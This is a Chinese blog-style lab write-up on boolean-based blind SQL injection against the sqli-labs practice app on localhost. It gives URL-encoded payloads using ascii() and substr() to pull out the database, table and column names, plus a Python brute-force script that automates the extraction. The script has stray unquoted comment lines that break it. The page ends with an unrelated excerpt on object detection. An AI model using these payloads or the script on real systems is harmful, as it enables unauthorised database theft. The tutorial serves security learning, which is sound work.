GET_Blind_Boolian Based-single Quetes

在这里插入图片描述

1.首先盲注是一般都是通过页面变化来判断是否存在注入
1)当传入数据正常时 url?id=1’ and 1=1 %23
在这里插入图片描述
2)当传入数据不正常时 url?id=1’ and 1=2 %23
在这里插入图片描述显而易见少了一个 “YOU ARE IN”

那么就很好办,我们就可以就构建payload

2.盲注一般利用 ascii(),substr()

ascii()将字符串转化成ascii码

substr(string,start,length)将字符串截取,第一个参数start从1开始不是0

group_concat()将一个组的内部数据以逗号分隔列出来

3.解析一下·ttp://127.0.0.1/Less-8/?id=1%27%20and%201=2%23

1.SELECT * FROM users WHERE id='1' and 1=2#' LIMIT 0,1这是内部语句
?id=1'这个单引号是为了引入新的语句也就是我们的注入,完整的是一对单引号,但因为添加新的语句,我们又引入的新的单引号,那么后面单引号我们就用%23注释掉这样我们就又恢复一对单引号 

4.接下来就是构造爆数据库
1.http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(database(),1,1))%3E97%20%23
在这里插入图片描述利用二分法猜第一个数据库的第一个字母的ascii大于97,页面显示正常
接下来继续猜,在英文字母中猜

英文和数字的ascii码
a-z:97-122,

baiA-Z:65-90

0-948-57

2.猜数据库的第一ascii小于123发现页面显示正常,因此根据区间可以确定是小写英文,继续利用二分法

在这里插入图片描述3又继续猜小于116还是正常

在这里插入图片描述

4.当猜到115是发现页面报错,这时我们估计这个就是115而115的ascii码是s
在这里插入图片描述以此类推,将剩些的字母猜出来,因为它们的操作都一样反复,我们可以写个脚本代替这些机械动作

import requests 

       
flag=""
for i in range(1,60):
    for j in range(1,130):
        url="http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27emails%27),{},1))={}%20%23".format(i,j)
        上面这个url是用来猜解列表的
        # url= "http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(database(),{},1))={}%20%23".format(i,j)
        这个是用来猜解数据库的
        # url="http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(%20(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=database()),{},1))={}%20%23".format(i,j)
        这个是用来猜解数据表的
        response=requests.get(url)
        if "You" in response.text:
            flag=flag+chr(j)
            print(flag)
           

这三个猜解的payload分别是
1.列http://127.0.0.1/Less-8/?id=1%27%20and%20ascii(substr((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27emails%27),1,1))=105%20%23

2.数据库http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(database(),{},1))={}%20%23".format(i,j)

3.数据表http://127.0.0.1/Less-1/?id=1%27%20and%20ascii(substr(%20(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=database()),{},1))={}%20%23".format(i,j)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
目标检测(Object Detection)是计算机视觉领域的一个核心问题,其主要任务是找出图像中所有感兴趣的目标(物体),并确定它们的类别和位置。以下是对目标检测的详细阐述: 一、基本概念 目标检测的任务是解决“在哪里?是什么?”的问题,即定位出图像中目标的位置并识别出目标的类别。由于各类物体具有不同的外观、形状和姿态,加上成像时光照、遮挡等因素的干扰,目标检测一直是计算机视觉领域最具挑战性的任务之一。 二、核心问题 目标检测涉及以下几个核心问题: 分类问题:判断图像中的目标属于哪个类别。 定位问题:确定目标在图像中的具体位置。 大小问题:目标可能具有不同的大小。 形状问题:目标可能具有不同的形状。 三、算法分类 基于深度学习的目标检测算法主要分为两大类: Two-stage算法:先进行区域生成(Region Proposal),生成有可能包含待检物体的预选框(Region Proposal),再通过卷积神经网络进行样本分类。常见的Two-stage算法包括R-CNN、Fast R-CNN、Faster R-CNN等。 One-stage算法:不用生成区域提议,直接在网络中提取特征来预测物体分类和位置。常见的One-stage算法包括YOLO系列(YOLOv1、YOLOv2、YOLOv3、YOLOv4、YOLOv5等)、SSD和RetinaNet等。 四、算法原理 以YOLO系列为例,YOLO将目标检测视为回归问题,将输入图像一次性划分为多个区域,直接在输出层预测边界框和类别概率。YOLO采用卷积网络来提取特征,使用全连接层来得到预测值。其网络结构通常包含多个卷积层和全连接层,通过卷积层提取图像特征,通过全连接层输出预测结果。 五、应用领域 目标检测技术已经广泛应用于各个领域,为人们的生活带来了极大的便利。以下是一些主要的应用领域: 安全监控:在商场、银行
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值